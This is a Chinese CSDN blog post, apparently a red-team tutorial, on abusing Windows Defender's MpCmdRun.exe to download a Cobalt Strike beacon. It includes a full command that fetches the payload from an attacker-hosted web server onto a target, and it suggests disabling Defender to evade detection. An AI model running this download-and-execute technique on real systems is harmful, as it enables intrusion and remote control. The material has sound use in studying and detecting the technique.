MpCmdRun恶意文件下载

最新推荐文章于 2024-04-03 07:57:25 发布
最新推荐文章于 2024-04-03 07:57:25 发布
阅读量2.6k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/108866696
版权

文章前言

Windows Defender是Windows 10系列自带的一款系统保护程序,可以对系统中的恶意程序、恶意行为进行查杀,与此同时,我们可以使用Windows Defender自带的命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件的目的,但是免杀好像还是不太可靠,不过我们可以在cmd中关闭Windows Defender,所以这样一来,一结合就变得有意思多了,不管在使用该思路的过程中还需要权限提升,但是CS因为在后渗透测试中有很好的辅助功能,所以总体来说还是划算的~

具体实现

Step 1:在cobaltstrike中生成恶意攻击载荷

Step 2:在攻击主机中搭建web服务托管beacon.exe程序

Step 3:在目标主机上使用Windows Defender自带的MpCmdRun.exe程序下载恶意文件

"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url http://192.168.188.129:6666/beacon.exe -path c:\\users\\resnd\\Desktop\\c-beacon.exe

Step 4:之后执行恶意文件,可以看到在CS中成功上线

 

 

 

 

 

FLy_鹏程万里
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
又一个下载恶意文件的政府网站
Purpleendurer@CSDN
08-22 3294
endurer 原创2006-08-22 第1版 首页有3处地方被加入:/--------<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>--------/hxxp://***object.cnic**b.com/15   的内容为插入许多空格的JavaScript脚本,利用 Microso
pikachu之不安全的文件下载概述
qq_42728977的博客
12-26 1011
不安全的文件下载概述 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。 此时如果 攻击者提交的不...
恶意下载文件
最新发布
m0_62207482的博客
04-03 349
说人话就是,浏览器并不认得这是什么类型,也不知道应该如何展示,只知道这是一种二进制文件,因此遇到content-type为application/octet-stream的文件时,浏览器会直接把它下载下来。意思是未知的应用程序文件,浏览器一般不会自动执行或询问执行。在某些下载文件的场景中,服务端可能会返回文件流,并在返回头中带上Content-Type:application/octet-stream,告知浏览器这是一个字节流,浏览器处理字节流的默认方式就是下载。
两个会自动下载恶意程序文件的政府网站
Purpleendurer@CSDN
08-18 4172
endurer 原创2006-08-18 第1版打开这两个网站时,Kaspersky 提示发现 Exploit.JS.ADODB.stream.e。第一个网站 hxxp://www.jing***.gov.cn的首页加入代码:--------<TR><script language=javascript src=bbs.js></script><TD vAlign=top align=
pikachu靶场-7 不安全的文件下载和上传
weixin_52180702的博客
12-13 1012
很多网站都会提供文件下载功能,即用户可以通过点击下载链接,下载到链接所对应的文件。但是,如果文件下载功能设计不当,则可能会导致攻击者可以通过构造文件路径,从而获取到后台服务器上的其他的敏感文件。文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。
Windows Defender的一些渗透知识
Ms08067安全实验室
02-23 945
前言Microsoft Defender,最初称为Microsoft AntiSpyware,是微软推出的一款杀毒软件。相信大家对Windows Defender 的防御性能还是没有怀疑的,毕竟最了解Windows系统的还得是微软自己。但是这货也比较令人头疼,毕竟它检测到问题直接就杀了,然后弹窗告诉用户“我已经拦截了一个XXX”。完全属于先斩后奏。今天正好看到大佬的文章,跟着学习一下Windows...
win10 家庭版安装软件报错:无法成功安装操作,因为文件包含病毒或潜在的垃圾软件
junjiahuang的博客
09-15 3089
安装软件时,系统提示:无法成功安装操作,因为文件包含病毒或潜在的垃圾软件。
MpCmdRun.log
01-02
MpCmdRun
Windows 10 Defender误删除了我的文件,用这个方法,轻松恢复
01-05
Windows 10 Defender误删除文件恢复方法 Windows 10 操作系统附带内置的防病毒保护,称为 Windows Defender。如果安全程序配置为检测并修复设备上的威胁,则 Windows Defender Antivirus 将隔离可疑文件。但是,...
多功能超强批处理(杀毒 优化 系统操作)
09-03
例如,Windows Defender可以通过`MpCmdRun.exe`执行命令行操作,如`MpCmdRun.exe -Scan -ScanType 3`来进行全盘扫描。 2. **系统优化**:优化可能包括清理临时文件、注册表清理、启动项管理等。批处理可以使用`Del`...
给Win10系统右键菜单添加Windows Defender扫描选项的方法.docx
09-27
7. 点击选中Command项,在右侧窗口,双击"默认"字符串值,在编辑数值数据窗口,将数值数据设置为"C:\Program Files\Windows Defender\MpCmdRun.exe -scan -scantype 3 -SignatureUpdate -file %1"。 完成注册表修改...
恶意代码分类
07-26
该资料很好的讲解了恶意代码的特征提取以及分类办法。
恶意代码分析实战 课后练习实验文件
09-07
恶意代码分析实战 课后练习配套完整文件。
Windows Defender渗透扫盲
st3pby的博客
06-20 996
查看排除项#查看版本#查看篡改保护(返回结果中的 数值5代表开启,数值4代表关闭)​​#需要TrustedInstaller权限##cmd注册表关闭Windows defender​##cmd关闭篡改保护​##cmd注册表恢复Windows defender​##cmd添加Windows defender排除项配置和管理 Microsoft Defender 防病毒软件的命令行工具。
永久禁用Windows Defender代码方案(可恢复)【支持Windows10、Windows11】
夜栩的博客
06-07 2157
选择【疑难解答】-【高级选项】-【启动设置】-【重启】,然后按4键进入安全模式。选择【疑难解答】-【高级选项】-【启动设置】-【重启】,然后按4键进入安全模式。(输入非YES的其它任意字符回车是恢复Windows Defender)以管理员身份打开PowerShell,复制代码回车后,输入YES回车。以管理员身份打开PowerShell,复制代码回车后,输入NO回车。cmd运行命令:shutdown -f -r -o -t 0。cmd运行命令:shutdown -f -r -o -t 0。
直接扫描到win10系统的计算机,win10下如何摆脱“Windows Defender需要扫描您的计算机”通知...
weixin_42500631的博客
07-26 1039
win10下如何摆脱“Windows Defender需要扫描您的计算机”通知Windows Defender是Windows 10的内置防病毒软件。该实用程序扫描作为Win 10自动维护的一部分。但是,“Windows Defender需要扫描您的计算机”操作中心通知仍然可以为某些用户定期弹出。因此,一些用户可能想知道他们可以做些什么来确保Windows Defender通知不会继续弹出。这是用...
Windows Defender开机自动更新升级病毒库
子曰小玖的博客
09-16 1981
VoltPillager: Hardware-based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface Abstract Hardware-based fault injection attacks such as voltage and clock glitching have been thoroughly studied on embedded devices.
Windows 10如何在命令行中执行Windows Defender
weixin_34292402的博客
08-08 2263
大家都知道 Windows Defender 是 Windows 10 中内置的反病毒、反恶意软件工具,通常情况下,它只在后台默默保护用户环境的安全。当然在用户需要的时候,也可通过其简洁明了的 GUI 图形界面进行更新定义和手动查杀等操作。 不过,你是否知道 Windows Defender 其实是支持在命令行下工作的呢?想必有人已经想到了,只要支持...
windows好用的还原软件
以渔的博客
06-14 856
1、快照类 还原大师、eazy fix 、RollBack Rx 优点:备份还原速度快 官方资料:http://rm.xia008.com/; http://www.eazsolution.com/downloads.html ;http://www.rollbacksoftware.com/ 2、系统自带 uwf 优点:系统原生、免费 官方资料:https://docs.microsoft.co...
C#调用杀毒软件MSE扫描指定目录或文件
06-02
你可以使用 Microsoft Security Essentials (MSE) 提供的命令行工具 MpCmdRun.exe 来实现 C# 调用 MSE 扫描指定目录或文件。 以下是示例代码: ```csharp using System.Diagnostics; public void ScanFileOrDirectory(string path) { // 构造扫描命令 string command = $"/Scan {path}"; // 调用 MpCmdRun.exe 执行扫描命令 ProcessStartInfo processInfo = new ProcessStartInfo("MpCmdRun.exe", command); processInfo.CreateNoWindow = true; processInfo.UseShellExecute = false; Process process = Process.Start(processInfo); process.WaitForExit(); // 处理扫描结果 if (process.ExitCode == 0) { Console.WriteLine("扫描完成,未发现病毒。"); } else if (process.ExitCode == 1) { Console.WriteLine("扫描完成,发现病毒。"); } else { Console.WriteLine("扫描出错。"); } } ``` 注意,为了能够调用 MpCmdRun.exe,你需要将其所在目录添加到系统环境变量中。另外,为了保证安全,你应该避免使用硬编码的路径,并对用户的输入进行严格的验证和过滤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值